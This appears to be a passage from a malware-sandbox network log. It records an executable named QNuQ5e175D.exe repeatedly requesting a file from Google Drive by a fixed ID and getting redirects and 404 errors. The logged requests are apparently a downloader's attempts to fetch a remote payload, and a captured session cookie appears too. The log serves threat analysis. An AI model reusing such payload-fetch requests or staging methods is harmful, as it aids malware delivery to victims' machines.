                                                        Timestamp: 2025-01-11 04:14:23 UTC | Bytes transferred: 1652 | Direction: IN | Data (ASCII): <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="YhzvBLZGec85k4kkEO5bMg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID: 14 | Source IP: 192.168.2.4 | Source Port: 50016 | Destination IP: 142.250.184.206 | Destination Port: 443 | PID: 7776 | Process: C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        Timestamp: 2025-01-11 04:14:34 UTC | Bytes transferred: 422 | Direction: OUT | Data: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        Timestamp: 2025-01-11 04:14:34 UTC | Bytes transferred: 1920 | Direction: IN | Data: HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:14:34 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-YjSB1EXhtJ0Ez_QqIhvAdw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        15 | 192.168.2.4 | 50017 | 172.217.16.193 | 443 | 7776 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2025-01-11 04:14:35 UTC | 464 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:14:35 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFIdbgRlD7hFYyBuizeg1e5mSmbLEPPNpdWTk3Zg2emGlH_mIk3_0ZZmeekOyUDv3jy0HTRx
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:14:35 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-hrIgp9iCnLYobQ1jA1kzoA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-11 04:14:35 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 4c 4c 2d 6b 57 58 66 59 50 6b 32 6a 43 56 69 37 56 6b 4c 5a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rLL-kWXfYPk2jCVi7VkLZQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        16 | 192.168.2.4 | 50018 | 142.250.184.206 | 443 | 7776 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2025-01-11 04:14:46 UTC | 422 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:14:46 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:14:46 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-dfKHYdqrJj2EaAXgRu8DEQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        17 | 192.168.2.4 | 50019 | 172.217.16.193 | 443 | 7776 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2025-01-11 04:14:47 UTC | 464 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:14:47 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFIdbgSnY6MHVQZHWiVUxGsXY2lK-pXKUqzAIOHDDJSm2CFsqzvb19yD943GHOpNh63vf21_9XC72ow
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:14:47 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-zKVdffCKg-qiUCMhY6inUw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-11 04:14:47 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 6c 59 72 69 56 75 38 56 4f 31 51 52 57 37 58 39 62 34 70 66 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KlYriVu8VO1QRW7X9b4pfg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        18 | 192.168.2.4 | 50020 | 142.250.184.206 | 443 | 7776 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2025-01-11 04:14:58 UTC | 422 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:14:59 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:14:58 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-SafmgB345mMy6mwKbILw6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        19 | 192.168.2.4 | 50021 | 172.217.16.193 | 443 | 7776 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2025-01-11 04:14:59 UTC | 464 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:15:00 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFIdbgQjNjklE7Z7CkrJ0c2eibhlxijgDHGsFK4sfozC0ktT1FF00VTnE6TLNLOKAHvwqTUo
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:15:00 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-_bS7AF2ooonXMRoz1QntCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-11 04:15:00 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 6e 49 4d 49 38 76 72 78 63 2d 4b 71 4b 32 4c 4c 6e 5a 68 63 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="nnIMI8vrxc-KqK2LLnZhcg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        20 | 192.168.2.4 | 50022 | 142.250.184.206 | 443 | 7776 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2025-01-11 04:15:10 UTC | 422 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:15:11 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:15:11 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-vL79CcVTA0OF6BC-_bq7_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        21 | 192.168.2.4 | 50023 | 172.217.16.193 | 443 | 7776 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2025-01-11 04:15:11 UTC | 464 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:15:12 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFIdbgRHiIk5OWEIMiNuXmNwG47Tjv0GwWBQh3X97hgHQnmrfthBIcQ2NQ2USWJYTOE9NQd_lw6GsfU
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:15:12 GMT
                                                        Content-Security-Policy: script-src 'nonce-OJtKk1cEY_gxfHRSLrA8Kg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
